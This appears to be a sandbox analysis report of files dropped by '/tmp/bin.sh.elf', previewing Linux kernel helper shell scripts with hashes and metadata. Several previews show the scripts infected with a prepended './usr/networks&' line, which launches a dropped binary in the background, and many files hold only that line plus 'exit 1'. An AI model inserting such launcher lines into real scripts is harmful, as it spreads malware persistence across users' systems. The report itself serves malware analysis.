                                                                        Preview:./usr/networks&..exit 1.}..function match_trace {..set +x..RET=0..TRACE=$1..EXPECT=$2..GOT="$(filter_trace "$TRACE")"...[ "$GOT" != "$EXPECT" ] && {...expect_fail "$EXPECT" "$GOT"...RET=1..}..set -x..return $RET.}..function test_start {..set +x..echo "----------------------------------------------------------------"..echo "Starting test: $*"..echo "----------------------------------------------------------------"..set -x.}..function failure {..get_trace..echo "FAIL: $*"..exit 1.}..function test_ctx_xmit {..test_start "test_ctx on lwt xmit"..install_test xmit test_ctx..ping -c 3 $IPVETH1 || {...failure "test_ctx xmit: packets are dropped"..}..match_trace "$(get_trace)" ".len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX.len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX.len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX" || exit 1..remove_prog xmit.}..function test_ctx_out {..test_start "test_ctx on lwt out"..install_test o
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3551
                                                                        Entropy (8bit):4.948896024544934
                                                                        Encrypted:false
                                                                        SSDEEP:48:mFiAzsLxzNr/h8zHJnAIb5wvlg4FbNyKjhQV/IzAodJwv5h0jZ+45A6xg4Ib7wQF:mbcfL5FhNThQx8AodKvEZ9Q9Qt/BIj
                                                                        MD5:D4D4BCF1202D60C541E70ED9F4493153
                                                                        SHA1:5DEE85412FED02349DE7E30D0B569010C150D319
                                                                        SHA-256:92D4296045B4595FA148224C9D714C2AD42E293685094CC53E255B091C09BB05
                                                                        SHA-512:9F72396C8437D2F6F0A2E488E90308E5B903697F7D6F0929BCB11367C53592FA949BFD329E6A9E2E6C56FC3F45E2187F22C5E9B82ADA5148150A7ECF36DC9B36
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. local exitcode=$1. shift. echo "ERROR: $@" >&2. exit $exitcode.}..function info() {. if [[ -n "$VERBOSE" ]]; then..echo "# $@". fi.}..## -- Helper function calls --..# Wrapper call for TC and IP.# - Will display the offending command on failure.function _call_cmd() {. local cmd="$1". local allow_fail="$2". shift 2. if [[ -n "$VERBOSE" ]]; then..echo "$cmd $@". fi. if [[ -n "$DRYRUN" ]]; then..return. fi. $cmd "$@". local status=$?. if (( $status != 0 )); then..if [[ "$allow_fail" == "" ]]; then.. err 2 "Exec error($status) occurred cmd: \"$cmd $@\""..fi. fi.}.function call_tc() {. _call_cmd "$TC" "" "$@".}.function call_tc_allow_fail() {. _call_cmd "$TC" "allow_fail" "$@".}.function call_ip() {. _call_cmd "$IP" "" "$@".}..## --- Parse command line arguments / parameters ---.# Using external program "getopt" to get --long-options.OPTIONS=$(getopt -o vfhd: \. --long verbose,flush,help,list,dev:,dry-run --
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4783
                                                                        Entropy (8bit):4.983372019940084
                                                                        Encrypted:false
                                                                        SSDEEP:96:9omCAr3I1KvvrbWK2By9bg28z6qBYXtCt+xN/xWa0GhNYu:SmJ3oKTiK2E9828z6SYdy+xya0Ggu
                                                                        MD5:A6274A52DC1BB7FEF3DB950BF932947A
                                                                        SHA1:09DF623D0F179F1E20B5D02E97687C8AFDA9F0A0
                                                                        SHA-256:6F042311F9C18CBD7A482F06512FC2EAC503EDD1DF4796D2131850E204416720
                                                                        SHA-512:F442A44D8B96786D3E027E32B1233DE4F0F1A1E229809BB108FF4A9A55647225FA0491005A650091CE14A82EA911A0B3C675988FE9BD082CE4FE1FFF792F2671
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.set -o errexit..## -- General shell logging cmds --.function err() {. local exitcode=$1. shift. echo "ERROR: $@" >&2. exit $exitcode.}..function warn() {. echo "WARN : $@" >&2.}..function info() {. if [[ -n "$VERBOSE" ]]; then..echo "INFO : $@" >&2. fi.}..## -- Pktgen proc config commands -- ##.export PROC_DIR=/proc/net/pktgen.#.# Three different shell functions for configuring the different.# components of pktgen:.# pg_ctrl(), pg_thread() and pg_set()..#.# These functions correspond to pktgens different components..# * pg_ctrl() control "pgctrl" (/proc/net/pktgen/pgctrl).# * pg_thread() control the kernel threads and binding to devices.# * pg_set() control setup of individual devices.function pg_ctrl() {. local proc_file="pgctrl". proc_cmd ${proc_file} "$@".}..function pg_thread() {. local thread=$1. local proc_file="kpktgend_${thread}". shift. proc_cmd ${proc_file} "$@".}..function pg_set() {. local dev=$1. local pro
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2377
                                                                        Entropy (8bit):5.214228688457712
                                                                        Encrypted:false
                                                                        SSDEEP:48:ZfG/4iToV7FBjBCTElukgjpgf3TQE8CPkG83lU/3wUu/XQcrS8vvDMIz4:tGAiQ5lukgjpwD7qBUvcrpDMV
                                                                        MD5:C3C7BFF67513E6EB03DCACBCEA896BAC
                                                                        SHA1:1162DB80FBABE8E5C28B92B5C3AE757BBC667393
                                                                        SHA-256:CE3FF5D793BA4F3D2B02EE96520DA1CAE56B7EF04AC7020FFD9A52F4F54B6ABC
                                                                        SHA-512:030EC273B9D095616C4FB81E6B25DAD11BF62014E35638982ADA272E52F00F38976FA2CA9A63C5A152512073E22C2C25DE480C396365431F7CE285A1CAC7B173
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# handle_ing() but exit early).#.# config: tc qdisc add dev $SOMEDEV handle ffff: ingress.#.# (3) ingress on this dev, handle_ing() -> tc_classify().#.# config: tc qdisc add dev $DEV handle ffff: ingress.#.# (4) ingress on this dev + drop at u32 classifier/action..#.basedir=`dirname $0`.source ${basedir}/functions.sh.root_check_run_with_sudo "$@"..# Parameter parsing via include.source ${basedir}/parameters.sh.# Using invalid DST_MAC will cause the packets to get dropped in.# ip_rcv() which is part of the test.if [ -z "$DEST_IP" ]; then. [ -z "$IP6" ] && DEST_IP="198.18.0.42" || DEST_IP="FD00::1".fi.[ -z "$DST_MAC" ] && DST_MAC="90:e2:ba:ff:ff:ff".[ -z "$BURST" ] && BURST=1024.[ -z "$COUNT" ] && COUNT="10000000" # Zero means indefinitely.if [ -n "$DST_PORT" ]; then. read -r DST_MIN DST_MAX <<< $(parse_ports $DST_PORT). validate_ports $DST_MIN $DST_MAX.fi..# Base Config.DELAY="0" # Zero means max speed..# General cleanup everything since last run.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):465
                                                                        Entropy (8bit):5.4019794559876315
                                                                        Encrypted:false
                                                                        SSDEEP:12:gFtLQSXFtY3HxfA6+XO0AaTB19qAbWO9cxZM+efJg0cK4n:GZQS+3HgXO0B9qEWOyxy+eBZ4
                                                                        MD5:54A6A3D258F9A9B950D60A5626825ADF
                                                                        SHA1:448FB38EBEEE3831DE36A834B79EF934294DDC8D
                                                                        SHA-256:821246C38A09A3923E111723BC97F9CD9283C8C35E3D1DFB0E72903332F34D61
                                                                        SHA-512:A8AFA3E3508CB1FEEB3A57FD3B8985B8BCC2EE97F51DD617B86CB7FED8F1B23B084AD78B73A8CF78AF0A9F069FF4EAD3873AB4080218E30809225BCCDF013112
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..cat <<EOF |.asm-generic/atomic-instrumented.h.asm-generic/atomic-long.h.linux/atomic-fallback.h.EOF.while read header; do..OLDSUM="$(tail -n 1 ${LINUXDIR}/include/${header})"..OLDSUM="${OLDSUM#// }"...NEWSUM="$(sed '$d' ${LINUXDIR}/include/${header} | sha1sum)"..NEWSUM="${NEWSUM%% *}"...if [ "${OLDSUM}" != "${NEWSUM}" ]; then...printf "warning: generated include/${header} has been modified.\n"..fi.done..exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4968
                                                                        Entropy (8bit):4.920227358499317
                                                                        Encrypted:false
                                                                        SSDEEP:96:Ym4VbZrlkq6N3KQjSDWtrdXHBI6AvIqU7PErnNLHbzObH6ImH4jK:/4/96N3KPWxdXHS6AQqUornN/zObaIm5
                                                                        MD5:85C37C9E403C29B8FFE899A13685EEDC
                                                                        SHA1:7AE6BC4CEA347DA3003FDBAF5C1543DB23A84C7A
                                                                        SHA-256:CAFC81A70AA3FA31E0CBA515F2D1A0C699A5AAE403EE7C93B4DF0D1383ED7E14
                                                                        SHA-512:A3E711D9049B1FD332B89CC2441D5A5C92BB5A60D7FD9938394C10EDA110A82D3F6E2F547F195A85CC4F8C2A56F91447255C8DF355EE5A2EE0691D5E468D604D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.file ${obj} | grep -q ELF || (echo "${obj} is not and ELF file." 1>&2 ; exit 0)..# Bail out early if there isn't an __ex_table section in this object file..objdump -hj __ex_table ${obj} 2> /dev/null > /dev/null.[ $? -ne 0 ] && exit 0..white_list=.text,.fixup..suspicious_relocs=$(objdump -rj __ex_table ${obj} | tail -n +6 |....grep -v $(eval echo -e{${white_list}}) | awk '{print $3}')..# No suspicious relocs in __ex_table, jobs a good'un.[ -z "${suspicious_relocs}" ] && exit 0...# After this point, something is seriously wrong since we just found out we.# have some relocations in __ex_table which point to sections which aren't.# white listed. If you're adding a new section in the Linux kernel, and.# you're expecting this section to contain code which can fault (i.e. the.# __ex_table relocation to your new section is expected), simply add your.# new section to the white_list variable above. If not, you're probably.# doing something wrong and the rest of this code is ju
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):302
                                                                        Entropy (8bit):5.219576879921936
                                                                        Encrypted:false
                                                                        SSDEEP:6:w6vp1jFhdSmORXjFhdSm7BvRubdSmxkA+JEe04n:w6vp18mOx8mFJuYmWASpn
                                                                        MD5:85210DF121FAA7D7C5A43F6B8E9CC1DE
                                                                        SHA1:B6650F883605434AD1508FF4C63383318459DD29
                                                                        SHA-256:1CE728C499D7489A6CE69F8A5217E94B4A331F385D30C7C093F1371A371FFFB2
                                                                        SHA-512:D9F06696FB3C5C26ECFE5EDA962F395DD45CCF9A28BCDE93C434D9EE252D2A6F1FAA5149F3F215799E1CFEBA34403903B15EB85E12148ADA92806BCA8756F236
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..MAJOR=$(echo __clang_major__ | $compiler -E -x c - | tail -n 1).MINOR=$(echo __clang_minor__ | $compiler -E -x c - | tail -n 1).PATCHLEVEL=$(echo __clang_patchlevel__ | $compiler -E -x c - | tail -n 1).printf "%d%02d%02d\\n" $MAJOR $MINOR $PATCHLEVEL../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3896
                                                                        Entropy (8bit):5.121242131865798
                                                                        Encrypted:false
                                                                        SSDEEP:96:cIRQQNQY1AsTe3MK6LU+9Tj2bDkBWkEf2MNi9ruP:JMKe3MxUsIkEkEf2MsBuP
                                                                        MD5:B1A3F65748EBE631AA1C34B049B6441B
                                                                        SHA1:27A5DC31170046E466607370AE53C4A17B5EEB66
                                                                        SHA-256:769F3EF12B3B1D92794755947A8ED18899D9F809BD21C913F1F2636BB69DCE21
                                                                        SHA-512:9B7F140B766B700E9729BA6C7DD1A89AFA6D007541AB86479B902959FB7432733A6C01AE282B55AE7328431A6B661E93CC05A1EECD9875E82D1CDB1B143706BB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..vmlinux=$1.basepath=$2.modpath=$3.declare -A cache.declare -A modcache..parse_symbol() {..# The structure of symbol at this point is:..# ([name]+[offset]/[total length])..#..# For example:..# do_basic_setup+0x9c/0xbf...if [[ $module == "" ]] ; then...local objfile=$vmlinux..elif [[ "${modcache[$module]+isset}" == "isset" ]]; then...local objfile=${modcache[$module]}..else...[[ $modpath == "" ]] && return...local objfile=$(find "$modpath" -name "${module//_/[-_]}.ko*" -print -quit)...[[ $objfile == "" ]] && return...modcache[$module]=$objfile..fi...# Remove the englobing parenthesis..symbol=${symbol#\(}..symbol=${symbol%\)}...# Strip segment..local segment..if [[ $symbol == *:* ]] ; then...segment=${symbol%%:*}:...symbol=${symbol#*:}..fi...# Strip the symbol name so that we could look it up..local name=${symbol%+*}...# Use 'nm vmlinux' to figure out the base address of said symbol...# It's actually faster to call it every time than to load it..# all into
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1309
                                                                        Entropy (8bit):5.41400347412325
                                                                        Encrypted:false
                                                                        SSDEEP:24:eZN4I8lR3Ei3FA3XqT0Lup4tYvrTJRv1RDh9Md+AOH+M4OYvF:ouR3NFiXgEuStYvrTJRv1RvM0iHOYvF
                                                                        MD5:7C9807BE857EBD80586127DFBD72DD09
                                                                        SHA1:6137B06329B80E3584A33969FF39D1CF4ACD66EC
                                                                        SHA-256:2432B269E2B8D3F7A99107C4A7E0E91CDDF26FE75AD5D1421E9F208990BB2ABA
                                                                        SHA-512:10260C00EDF44FBF9CE496EE0D42C8D241835AC2A79D9D867209E1138DC643521CD6BBE4A19D27EEA0468C4057C28B82FB50707552F700FCF06418951135A7D6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi.DEPMOD=$1.KERNELRELEASE=$2..if ! test -r System.map ; then..echo "Warning: modules_install: missing 'System.map' file. Skipping depmod." >&2..exit 0.fi..# legacy behavior: "depmod" in /sbin, no /sbin in PATH.PATH="$PATH:/sbin".if [ -z $(command -v $DEPMOD) ]; then..echo "Warning: 'make modules_install' requires $DEPMOD. Please install it." >&2..echo "This is probably in the kmod package." >&2..exit 0.fi..# older versions of depmod require the version string to start with three.# numbers, so we cheat with a symlink here.depmod_hack_needed=true.tmp_dir=$(mktemp -d ${TMPDIR:-/tmp}/depmod.XXXXXX).mkdir -p "$tmp_dir/lib/modules/$KERNELRELEASE".if "$DEPMOD" -b "$tmp_dir" $KERNELRELEASE 2>/dev/null; then..if test -e "$tmp_dir/lib/modules/$KERNELRELEASE/modules.dep" -o \...-e "$tmp_dir/lib/modules/$KERNELRELEASE/modules.dep.bin"; then...depmod_hack_needed=false..fi.fi.rm -rf "$tmp_dir".if $depmod_hack_needed; then..symlink="$INSTALL_MOD_PATH/lib/modules/99.98.$KERNEL
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):839
                                                                        Entropy (8bit):5.230182269131585
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vXjLYbl6v99FwjPF6vC2OlFeSj/PnBqBAACqn9q2eLAItfnJ2WDFUejDcAANUH:rXjMy99FwiCplBPhR243RnJ2WZv+D4
                                                                        MD5:6578F62E5AA90B2455866F70CB00DB8C
                                                                        SHA1:5D58A9B336173EF29C843F14B6ADF65C347B3849
